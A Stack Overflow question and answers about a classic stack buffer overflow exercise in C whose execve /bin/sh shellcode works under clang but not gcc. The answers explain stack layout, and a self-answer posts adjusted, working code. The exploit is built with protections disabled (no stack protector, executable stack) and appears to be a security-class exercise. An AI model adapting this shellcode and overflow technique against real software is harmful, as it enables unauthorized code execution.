# buffer overflow attack works when compiled using clang but not when compiled using gcc

Tags: c, gcc, clang, buffer-overflow

```
char shellcode[] = "\xeb\x18\x5e\x31\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh        ";
 
char large_string[128];
 
void main() { 
    char buffer[48];
    int i;
    long *long_ptr = (long *) large_string;
    
    for(i=0; i < 32; ++i) // 128/4 = 32
        long_ptr[i] = (int) buffer;
 
    for(i=0; i < strlen(shellcode); i++){
        large_string[i] = shellcode[i];
    }
    
    strcpy(buffer, large_string);
}
```

The above is an example code for performing buffer overflow attack, it works when compiled using clang , but not when compiled using gcc. I think the problem is than of array alignment. On using the compile flag -mpreferred-stack-boundary=2 the program do works in gcc. But is there another solution without using -mpreferred-stack-boundary=2 ?

Can we fix the memory alignment issue if any, in the code itself ?

The compiler flag i used for both gcc and clang are `-w -m32 -g -fno-stack-protector -z execstack -O0`.

Comment: These crude buffer overflow attacks ought to be off-topic for Stack Overflow. By its nature, an attempt to exploit a program is highly dependent on everything about the program—how it is compiled, its target platform, details inside the program, and more. Asking how a specific attack can be fixed for a specific situation is about as useful as asking what the password to one specific account is. If you are taking a class on computer security, it ought to be providing you the information you need for the class exercise, so that you do not need to ask on Stack Overflow.

Comment: Don't use `strlen(shellcode)`, because `shellcode` may contain a NUL byte (`'\0'), and *strlen* will truncate it. Use `sizeof(shellcode) - 1` instead. If you think that your `shellcode` never contains a NUL byte, then check it explicitly: `if (strlen(shellcode) != sizeof(shellcode) - 1) { ... }`.

Comment: Similarly, use `memcpy` instead of `strcpy`.

Answer (score 0):

This is the stack layout of your `main` function on x86 (any of 16-bit, 32-bit and 64-bit code), while it is running:

- temporaries
- in any order:

  - alignment, `buffer`
  - alignment, `i`
  - alignment, `long_ptr`
- alignment
- return address (pushed by the caller)
- `argc` (pushed by the caller) (even if you declare `main` without parameters)
- `argv` (pushed by the caller) (even if you declare `main` without parameters)

The compiler is free to choose the order of local variables, and it is free to choose the amounts of alignment.

The reason why the shellcode works with one compiler is that it is making specific assumptions about the order of local variables and the amounts of alignment.

Typically an exploit shellcode is written for a specific, precompiled binary executable, in which these are already made by the compiler and they are revealed by the disassebmbly output.

Comment: thanks for answering ,  alignment seems to be a issue, i have another code which works when compiled gcc but dont on clang, i have seen this pattern for multiple such codes. The code in the question is an example, what can i change in the code to make it work on gcc? is there a way to fix the alignment issue  without changing the array sizes and without using compiler flags like  -mpreferred-stack-boundary=2?

Comment: To fix it, try to make `large_string` larger (e.g. 256 bytes, and `i < sizeof(large_string) / sizeof(long)`). If that doesn't help, then I have no idea.

Answer (score 0):

Found the solution
We need to add a +4 to long_ptr[i] = (int) buffer and another +4 to large_string[i].
The program now looks like this.

```
      // without zeros 
char shellcode[] = "\xeb\x18\x5e\x31\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh        ";

char large_string[128];
 
void main() { 
    char buffer[48];
    int i;
    long *long_ptr = (long *) large_string;
    
    for(i=0; i < 32; ++i) // 128/4 = 32
        long_ptr[i] = (int) buffer+4;

 
    for(i=0; i < strlen(shellcode); i++){
        large_string[i+4] = shellcode[i];
    }
    
    strcpy(buffer, large_string);
}
```